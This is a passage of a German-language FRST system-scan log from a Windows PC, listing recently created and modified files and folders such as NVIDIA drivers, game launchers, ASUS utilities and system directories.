2022-05-29 16:59 - 2022-05-21 05:26 - 001209408 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll 
2022-05-29 16:59 - 2022-05-21 05:26 - 001145584 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll 
2022-05-29 16:59 - 2022-05-21 05:26 - 001145584 _____ C:\Windows\SysWOW64\vulkan-1.dll 
2022-05-29 16:59 - 2022-05-21 05:23 - 000587336 _____ C:\Windows\system32\nvofapi64.dll 
2022-05-29 16:59 - 2022-05-21 05:23 - 000460496 _____ C:\Windows\SysWOW64\nvofapi.dll 
2022-05-29 16:59 - 2022-05-21 05:22 - 002120896 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll 
2022-05-29 16:59 - 2022-05-21 05:22 - 001603144 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll 
2022-05-29 16:59 - 2022-05-21 05:22 - 001530456 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll 
2022-05-29 16:59 - 2022-05-21 05:22 - 001177312 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll 
2022-05-29 16:59 - 2022-05-21 05:22 - 000730320 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll 
2022-05-29 16:59 - 2022-05-21 05:22 - 000712416 _____ (NVIDIA Corporation) C:\Windows\system32\nvidia-smi.exe 
2022-05-29 16:59 - 2022-05-21 05:21 - 006964824 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll 
2022-05-29 16:59 - 2022-05-21 05:21 - 006226640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll 
2022-05-29 16:59 - 2022-05-21 05:21 - 005100752 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll 
2022-05-29 16:59 - 2022-05-21 05:21 - 002932952 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll 
2022-05-29 16:59 - 2022-05-21 05:21 - 000582712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll 
2022-05-29 16:59 - 2022-05-21 05:21 - 000457944 _____ (NVIDIA Corporation) C:\Windows\system32\nvdebugdump.exe 
2022-05-29 16:59 - 2022-05-21 05:20 - 005730880 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll 
2022-05-29 16:59 - 2022-05-21 05:19 - 000851136 _____ (NVIDIA Corporation) C:\Windows\system32\MCU.exe 
2022-05-29 16:59 - 2022-05-20 02:51 - 000089337 _____ C:\Windows\system32\nvinfo.pb 
2022-05-27 15:04 - 2022-05-27 15:04 - 000000000 ____D C:\Users\Pauli\AppData\Local\MW5Mercs 
2022-05-24 18:11 - 2022-05-24 18:11 - 000000222 _____ C:\Users\Pauli\Desktop\Cat Goes Fishing.url 
2022-05-24 18:11 - 2022-05-24 18:11 - 000000000 ____D C:\Users\Pauli\AppData\Local\Cat_Goes_Fishing 
2022-05-23 14:52 - 2022-05-23 14:52 - 000466456 _____ (Creative Labs) C:\Windows\system32\wrap_oal.dll 
2022-05-23 14:52 - 2022-05-23 14:52 - 000444952 _____ (Creative Labs) C:\Windows\SysWOW64\wrap_oal.dll 
2022-05-23 14:52 - 2022-05-23 14:52 - 000122904 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\system32\OpenAL32.dll 
2022-05-23 14:52 - 2022-05-23 14:52 - 000109080 _____ (Portions (C) Creative Labs Inc. and NVIDIA Corp.) C:\Windows\SysWOW64\OpenAL32.dll 
2022-05-23 14:52 - 2022-05-23 14:52 - 000000000 ____D C:\Users\Pauli\AppData\Local\Dovetail Games 
2022-05-23 14:52 - 2022-05-23 14:52 - 000000000 ____D C:\Program Files (x86)\OpenAL   
==================== Ein Monat (geänderte) ==================   
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)   
2022-06-20 17:30 - 2022-04-08 20:49 - 000000000 ____D C:\Windows\dl 
2022-06-20 17:29 - 2022-04-08 20:41 - 000000000 ____D C:\Program Files (x86)\Steam 
2022-06-20 17:29 - 2022-04-08 19:27 - 000000000 ____D C:\ProgramData\NVIDIA 
2022-06-20 17:29 - 2022-04-08 19:19 - 001223640 _____ () C:\Windows\system32\wpbbin.exe 
2022-06-20 17:29 - 2022-04-08 19:19 - 001164992 _____ C:\Windows\system32\AsusUpdateCheck.exe 
2022-06-20 17:29 - 2022-04-08 19:19 - 000012288 ___SH C:\DumpStack.log.tmp 
2022-06-20 17:29 - 2022-04-08 19:19 - 000000006 ____H C:\Windows\Tasks\SA.DAT 
2022-06-20 17:29 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SystemTemp 
2022-06-20 17:29 - 2021-06-05 14:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 
2022-06-20 17:28 - 2021-06-05 19:52 - 000756916 _____ C:\Windows\system32\perfh007.dat 
2022-06-20 17:28 - 2021-06-05 19:52 - 000156108 _____ C:\Windows\system32\perfc007.dat 
2022-06-20 17:28 - 2021-06-05 14:10 - 000000000 ___HD C:\Windows\system32\GroupPolicy 
2022-06-20 17:28 - 2021-06-05 14:01 - 000524288 _____ C:\Windows\system32\config\BBI 
2022-06-20 17:26 - 2021-06-05 14:10 - 000000000 ___HD C:\Program Files\WindowsApps 
2022-06-20 17:26 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\AppReadiness 
2022-06-20 17:25 - 2022-04-08 20:49 - 000000000 ____D C:\Windows\cc 
2022-06-20 17:25 - 2022-04-08 19:24 - 001750916 _____ C:\Windows\system32\PerfStringBackup.INI 
2022-06-20 17:25 - 2021-06-05 14:09 - 000000000 ____D C:\Windows\INF 
2022-06-20 17:22 - 2022-04-08 19:23 - 000004784 _____ C:\Windows\system32\Tasks\MicrosoftEdgeShadowStackRollbackTask 
2022-06-20 17:22 - 2022-04-08 19:19 - 000002622 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 
2022-06-20 17:22 - 2022-04-08 19:19 - 000002460 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 
2022-06-20 17:19 - 2022-04-08 19:32 - 000000087 _____ C:\Windows\skipsavetoini 
2022-06-20 17:16 - 2022-04-08 19:35 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 
2022-06-20 17:16 - 2022-04-08 19:34 - 000000000 ____D C:\Windows\system32\Tasks\ASUS 
2022-06-20 17:16 - 2022-04-08 19:32 - 000000000 ____D C:\Program Files (x86)\ASUS 
2022-06-20 17:15 - 2022-04-08 19:36 - 000000000 ____D C:\Program Files\ASUS 
2022-06-20 17:15 - 2022-04-08 19:32 - 000000000 ____D C:\ProgramData\Package Cache 
2022-06-20 17:13 - 2022-04-08 19:30 - 000000000 __RHD C:\Users\Public\AccountPictures 
2022-06-20 17:13 - 2022-04-08 19:19 - 000000000 ____D C:\ProgramData\ASUS 
2022-06-20 17:12 - 2022-04-08 19:36 - 000032304 _____ (Creative Technology Innovation Co., LTd.) C:\Windows\system32\Drivers\CtiAIo64.sys 
2022-06-20 17:06 - 2022-04-08 19:30 - 000000000 ____D C:\Users\Pauli\AppData\Local\D3DSCache 
2022-06-20 17:04 - 2022-04-08 19:19 - 000000000 ____D C:\Windows\system32\SleepStudy 
2022-06-20 15:48 - 2022-04-08 19:30 - 000000000 ____D C:\Users\Pauli\AppData\Local\Packages 
2022-06-20 11:04 - 2021-06-05 14:10 - 000000000 ___HD C:\Windows\ELAMBKUP 
2022-06-20 09:45 - 2021-06-05 14:01 - 000000000 ____D C:\Windows\CbsTemp 
2022-06-19 21:45 - 2022-04-08 21:45 - 000000000 ____D C:\XboxGames 
2022-06-19 21:41 - 2022-04-08 19:28 - 000000000 ____D C:\ProgramData\Packages 
2022-06-19 21:34 - 2022-04-08 21:54 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam 
2022-06-19 21:22 - 2022-04-08 19:20 - 000001623 _____ C:\Windows\system32\config\VSMIDK 
2022-06-19 21:21 - 2021-06-05 14:18 - 000233808 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys 
2022-06-19 21:21 - 2021-06-05 14:18 - 000069960 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vkrnlintvsc.sys 
2022-06-19 21:21 - 2021-06-05 14:18 - 000069952 ____N (Microsoft Corporation) C:\Windows\system32\Drivers\vkrnlintvsp.sys 
2022-06-19 21:19 - 2022-04-08 19:32 - 000003588 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1424437550-2087844553-323541659-1001 
2022-06-19 21:19 - 2022-04-08 19:32 - 000003378 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1424437550-2087844553-323541659-1001 
2022-06-19 21:19 - 2022-04-08 19:32 - 000002395 _____ C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 
2022-06-19 21:09 - 2022-04-08 19:19 - 000292792 _____ C:\Windows\system32\FNTCACHE.DAT 
2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files\Windows Photo Viewer 
2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection 
2022-06-19 21:08 - 2021-06-05 20:00 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___SD C:\Windows\SysWOW64\F12 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___SD C:\Windows\system32\F12 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\vi-VN 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\oobe 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\lv-LV 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\lt-LT 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\id-ID 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\gl-ES 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\eu-ES 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\et-EE 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\es-MX 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\Dism 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SysWOW64\ca-ES 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\SystemResources 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\vi-VN 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\oobe 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\lv-LV 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\lt-LT 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\id-ID 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\gl-ES 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\eu-ES 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\et-EE 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\es-MX 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\Dism 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\DDFs 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\ca-ES 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\appraiser 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\ShellExperiences 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\ShellComponents 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\PolicyDefinitions 
2022-06-19 21:08 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\bcastdvr 
2022-06-19 15:44 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\WeMod 
2022-06-18 21:41 - 2022-04-09 12:49 - 000000000 ____D C:\Users\Pauli\AppData\Local\CrashDumps 
2022-06-18 16:39 - 2022-04-08 21:43 - 000002169 _____ C:\Users\Pauli\Desktop\WeMod.lnk 
2022-06-18 16:39 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WeMod 
2022-06-18 16:39 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Local\WeMod 
2022-06-18 16:38 - 2022-04-08 21:43 - 000000000 ____D C:\Users\Pauli\AppData\Local\SquirrelTemp 
2022-06-17 14:23 - 2022-04-29 20:04 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\LGHUB 
2022-06-17 14:10 - 2022-04-29 20:04 - 000000000 ____D C:\Users\Pauli\AppData\Local\LGHUB 
2022-06-17 14:04 - 2022-04-08 19:34 - 000000000 ____D C:\Windows\system32\MRT 
2022-06-17 14:03 - 2022-04-08 19:34 - 145918784 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 
2022-06-17 14:01 - 2022-04-08 19:22 - 003101184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll 
2022-06-15 13:48 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\SecurityHealth 
2022-06-13 16:25 - 2022-04-30 13:17 - 000000000 ____D C:\Users\Pauli\Documents\My Games 
2022-06-12 18:11 - 2022-05-13 19:14 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Setup 
2022-06-12 14:41 - 2022-05-13 20:23 - 000000000 ____D C:\Program Files\LGHUB.d47858fb-ee82-4f88-8d4f-f004e34df74b 
2022-06-11 19:57 - 2022-04-15 19:31 - 000000000 ____D C:\Program Files (x86)\Origin 
2022-06-11 19:57 - 2022-04-09 14:33 - 000000000 ____D C:\ProgramData\Origin 
2022-06-10 14:58 - 2022-04-08 22:50 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\.minecraft 
2022-06-10 12:48 - 2022-04-09 17:44 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\paradox-launcher-v2 
2022-06-09 18:57 - 2022-04-08 20:41 - 002762208 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll 
2022-06-09 18:57 - 2022-04-08 20:41 - 000402920 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll 
2022-06-09 18:57 - 2022-04-08 20:41 - 000230864 _____ (Microsoft Corporation) C:\Windows\system32\gamingservicesproxy.dll 
2022-06-09 18:57 - 2022-04-08 20:41 - 000198112 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll 
2022-06-09 18:57 - 2022-04-08 20:41 - 000136672 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll 
2022-06-09 18:57 - 2022-04-08 20:41 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll 
2022-06-09 18:57 - 2022-04-08 20:41 - 000062928 _____ (Microsoft Corporation) C:\Windows\system32\gamemodcontrol.exe 
2022-06-07 14:23 - 2022-04-13 20:51 - 000008698 _____ C:\Users\Pauli\Documents\HudSight.txt 
2022-06-06 20:49 - 2022-04-08 20:49 - 000000000 ____D C:\Program Files (x86)\Salfeld 
2022-06-06 17:59 - 2022-04-08 19:27 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 
2022-06-05 15:34 - 2022-04-14 16:00 - 000000000 ____D C:\Users\Pauli\AppData\Local\EpicGamesLauncher 
2022-06-05 15:22 - 2022-04-11 21:20 - 001431256 _____ (Wellbia.com Co., Ltd.) C:\Windows\xhunter1.sys 
2022-06-02 19:32 - 2022-04-15 19:31 - 000000000 ____D C:\ProgramData\Electronic Arts 
2022-06-02 19:31 - 2022-04-09 13:01 - 000000000 ____D C:\Program Files\EA Games 
2022-06-02 17:35 - 2022-04-09 23:13 - 000000000 ____D C:\ProgramData\TruckersMP 
2022-06-02 12:47 - 2021-06-05 14:10 - 000000000 ____D C:\Windows\system32\NDF 
2022-06-01 20:51 - 2022-04-08 19:32 - 000000000 ____D C:\Users\Pauli\AppData\Local\PlaceholderTileLogoFolder 
2022-05-30 17:01 - 2022-04-09 13:03 - 000000000 ____D C:\Users\Pauli\AppData\Local\UnrealEngine 
2022-05-29 17:04 - 2022-04-08 19:33 - 000000000 ____D C:\Users\Pauli\AppData\Local\NVIDIA 
2022-05-29 17:02 - 2022-04-08 19:45 - 000004308 _____ C:\Windows\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003976 _____ C:\Windows\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003940 _____ C:\Windows\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003894 _____ C:\Windows\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000003654 _____ C:\Windows\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 
2022-05-29 17:02 - 2022-04-08 19:45 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 
2022-05-29 17:02 - 2022-04-08 19:27 - 000000000 ____D C:\Program Files\NVIDIA Corporation 
2022-05-23 20:58 - 2022-04-17 12:34 - 000000217 _____ C:\Users\Pauli\Desktop\Flashing Lights - Polizei, Feuerwehr, Rettungsdienst-Simulator.url 
2022-05-21 05:22 - 2022-04-08 19:49 - 000724688 _____ (NVIDIA Corporation) C:\Windows\system32\nvml.dll 
2022-05-21 05:18 - 2022-04-08 19:27 - 007618584 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll 
2022-05-21 05:18 - 2022-04-08 19:27 - 006465200 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll   
==================== SigCheck ============================   
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)   
==================== Ende von FRST.txt ========================      |